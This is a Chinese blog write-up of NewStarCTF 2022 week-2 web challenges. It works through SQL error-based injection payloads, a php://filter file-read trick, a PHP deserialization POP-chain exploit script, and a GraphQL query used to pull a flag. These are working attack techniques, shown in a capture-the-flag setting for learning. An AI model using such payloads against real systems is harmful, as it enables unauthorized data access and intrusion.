七校联合NewStarCTF 公开赛赛道WEEK2 web wp

已于 2022-10-02 22:47:55 修改
阅读量3.1k 收藏 21
点赞数 4
分类专栏: 题解 文章标签: php web安全 安全
于 2022-09-26 19:28:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/trytowritecode/article/details/127058676
版权

也不知道是不是公开赛和内部赛是不是同一套题,week1的题挺简单的
这里小记一下week2的题目
如有侵权立刻删除

Word-For-You(2 Gen)

这题很简单就带过一下吧,报错注入就行

1’||updatexml(1,concat(0x7e,database()),1)#
1’||updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#
在这里插入图片描述在这里插入图片描述

最后没记错flag好像在 wfy_comments 这个表里的text下
1’||updatexml(1,concat(0x7e,(select reverse(group_concat(text)) from wfy_comments)),1)#
reverse一下倒着取
在这里插入图片描述
取出来逆一下
在这里插入图片描述

IncludeOne

伪随机
在这里插入图片描述
应该是要爆破种子
在这里插入图片描述看题目里随机了两次我们也随机两次
在这里插入图片描述

然后写个伪协议,base被禁了就用rot13
在这里插入图片描述?file=php://filter/NewStar/read=string.rot13/resource=flag.php

然后去解码
在这里插入图片描述

UnserializeOne

反序列化

 <?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

看看链
这里写的时候犯了点错误

链还是挺简单的

Start->__destruct 触发 Sec->__toString 触发 Easy->__call
触发 eeee->__clone 触发 Start->__isset 触发 Sec->invoke

<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;
    public function __construct(){
        $this->func=new Sec();
        $this->name=new Sec();
    }
    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        echo 'Start-isset,第五个';
        ($this->func)();
    }
}
class Sec{
    private $obj;
    public $var;

    public function __construct(){
        $this->obj=new Easy();

    }
    public function __toString()
    {
        echo '第二个';
        $this->obj->check($this->var);
        return "CTFers";
        
    }

    public function __invoke()
    {
        echo '第六个';
        echo file_get_contents('/flag');
    }
}
class Easy{
    public $cla;
    public function __call($fun, $var)
    {
        echo '第三个';
        $this->cla = clone $var[0];
        echo '复制完成';
        var_dump($this->cla);

    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        echo '第四个';
        if(isset($this->obj->cmd)){
            echo '触发啊';
            echo "success";
            
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}


$c=new eeee();
$a=new Start();
$c->obj=$a;
$b=new Sec();
$b->var=$c;
$a->name=$b;


echo '<br>';
echo urlencode(serialize($c));
echo '<br>';
echo '<br>';
echo '<br>';

这是利用的代码一开始判断错误,想着入口一定是Start ,后面才想到让
eeee先进去这样也会触发Start 的__destruct 方法,然后解决问题就是中间有一次反序列化的时候到了这一段

class Easy{
    public $cla;
    public function __call($fun, $var)
    {
        echo '第三个';
        $this->cla = clone $var[0];
        echo '复制完成';
        var_dump($this->cla);

    }
}

发现复制没成功,然后就一直在思考,发现这个类的cla
虽然是eeee类但是obj是空的于是推倒重来
然后就是发现了Sec的那个var需要改成public 这样在外部赋值我们才能给他赋值上一个obj指向Start的eeee类,这里我一开始是把eeee类的初始化直接写到construct里但是反序列化失败了于是就全拖出来写了

本地看看
在这里插入图片描述
确实都利用成功了
在这里插入图片描述
然后就是把链放进去就行了

ezAPI

这题之前没接触过挺新的之后是知道了graphql 查询才写出来的
访问 url/www.zip 获得源码

 function send($data)
                {
                    $options = array(
                        'http' => array(
                            'method' => 'POST',
                            'header' => 'Content-type: application/json',
                            'content' => $data,
                            'timeout' => 10 * 60
                        )
                    );
                    $context = stream_context_create($options);
                    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
                    return $result;
                }

                if (isset($id)) {
                    if (waf($id)) {
                        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';
                        $res = json_decode(send($data));
                        if ($res->data->users_user_by_pk->name !== NULL) {
                            echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
                        } else {
                            echo "<b>Can't found it!</b><br><br>DEBUG: ";
                            var_dump($res->data);
                        }
                    } else {
                        die("<b>Hacker! Only Number!</b>");
                    }
                } else {
                    die("<b>No Data?</b>");
                }

这一段代码,data完全可控也就是构造graphql 查询

借用一下大佬的博客
酒仙桥六号部队

就是这里面大家可以看

然后利用内省查询看到所有接口情况
在这里插入图片描述
这里找到了和一个flag有关的接口,这里怎么读还是想了挺久的
后面想的是,我直接用这个接口查因为从源码里我们能看到,他的接口是这么写的

$data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}'

在这里插入图片描述写到post里大概就是这样,那我们直接用他的接口
在这里插入图片描述
看到这name里有个flag,应该就是查询这个接口的flag,然后不需要前置条件,因为我们查users_user_by_pk这个接口的时候有个id=,这个前置条件,但是flag这个接口里并没有找到
然后就尝试了一下这个写法

&data={"query":"query{\nffffllllaaagggg_1n_h3r3_flag {\nflag\n}\n}\n", "variables":null}

在这里插入图片描述flag就出来了

不得不说这第二周的题和第一周比起来差距有点大,这第四题确实写了好一会儿,也算多了解了一块知识点

在这里插入图片描述哈哈哈哈哈和另一个逆向队友快乐玩耍

递归 trash can
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
NewStarCTF 2023 公开赛Week1(1),View的这些基础知识你必须要知道
04-08 810
c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = getPrime(32) e = inverse(d, (p-1)*(q-1)) n = p*q m = bytes_to_long(flag)c = po
NewStarCTF 2023 公开赛Week1,数据结构与算法面试题
04-08 790
刚开始以为是摩斯密码,看了B神博客才知道:WhiteSpace,是一种只用空白字符(空格,TAB和回车)编程的语言,而其它可见字符统统为注释。把空白字符复制进去网站,点击run即可。
NewStarCTF 公开赛赛道week2 web writeup
your_friends的博客
10-02 796
利用mt_srand是伪随机数用它给出的Hint到php_mt_seed里面直接跑。如果我们post提交了一个data那么他就不会执行后面的文件从而执行我们自己的输入。由Easy::__call方法进入eeee::__clone。进入__invoke需要调用到Start::__isset。上周做题被这道sql注入整感动了,这次增加难度又来了。由Sec::__tostring进入__call方法。最终调用点在Sec::__invoke。发现我们直接在页面查询是输入了一个id。虽然加了点难度,但是还是挺简单。
青少年CTF - Crypto - 一起下棋 Wp WriteUp
zxsctf的博客
10-01 1177
题目来自于青少年CTF平台,题目名称:一起下棋。
NewStarCTF 2024 公开赛Week1
最新发布
2401_85238540的博客
07-20 864
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
NewStarCTF 公开赛wp
FUCKING12的博客
10-16 1559
新生赛wp
NewStarCTF 公开赛赛道 week5|web wp
m0_64815693的博客
10-23 2817
NewStarCTF 公开赛赛道 第五周 web wp
BUUCTF NewStarCTF 2023 WEBWP
qq_65165505的博客
10-07 2613
NewStarCTF 2023 公开赛web题目wp
NewStarCTF 2023 第一阶段公开赛道部分wp
10-02
这是官方的wp文件,需要的可以下载查看
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
《华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料》 在当今信息化社会,无线局域网(WLAN)已经成为我们日常生活和工作中不可或缺的一部分。华为作为全球领先的ICT解决方案提供商,其主办的“华为中国大学生ICT...
NewStarCTF 2024 公开赛Week1,2024年最新阿里面试官
2401_84181309的博客
04-10 1090
from Crypto.Util.number import * from flag import flagdef gen_prime(n): res = 1for i in range(15): res *= getPrime(n)return resif name == ‘__main__’: n = gen_prime(32) e = 65537 m = bytes_to_long(flag) c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然
青少年CTF-Web-帝国CMS1-3通关记录
zxsctf的博客
12-08 1719
本次进通过平台内题目进行,非真实环境。 首先下发题目链接我们首先先找后台看看后台地址为随后,经过dirsearch进行扫描,得到了一个www.zip 访问扫描到的www.zip,得到网站源码使用D盾扫描,得到eval后门。蚁剑链接得到根目录的Flag这道题目和CMS01差不多,但是好像又有天差地别管理员发现你入侵了他的服务器,管理员修改了密码并删除了后门那么我们优先尝试管理员是不是给了一个弱口令经过弱口令爆破登陆成功密码为123456789这道题目考察了一个帝国CMS的漏洞利用,我们先看看帝国CMS03有什
青少年CTF Misc-Easy caesar WP
weixin_55265137的博客
10-11 334
青少年CTF Misc-Easy caesar WP
NewStarCTF 2022 web方向题解 wp
Jay17的博客
08-29 2718
NewStarCTF 2022 web方向题解 wp
Newstarctf week5逆向wp
weixin_66718841的博客
10-24 1059
NewStarCTFweek5逆向wp
NewStarCTF 公开赛赛道
shinygod的博客
10-06 1963
基础练习
2023NewStarCTF-crypto-week1 WP(纯萌新视角解题思考过程,含题目可放心食用
2301_79283256的博客
10-03 441
2023NewStarCTF-crypto-week1 WP题解
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1786
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
NewStarCTF week2 部分题解
Aiwin的博客
09-29 3374
NewStarCTF week2 尽力的某些题解
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程代码执行等安全问题。根据引用\[2\]中的代码片段,这个挑战可能涉及到通过传递参数来实现SSRF攻击,其中包括目标主机和端口。具体的攻击方法和解决方案需要根据题目的具体要求和环境来确定。 #### 引用[.reference_title] - *1* *2* [SSRF总结](https://blog.csdn.net/weixin_53090346/article/details/129025771)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [2022 SWPU新生赛&HNCTF web部分题目](https://blog.csdn.net/weixin_63231007/article/details/127135455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值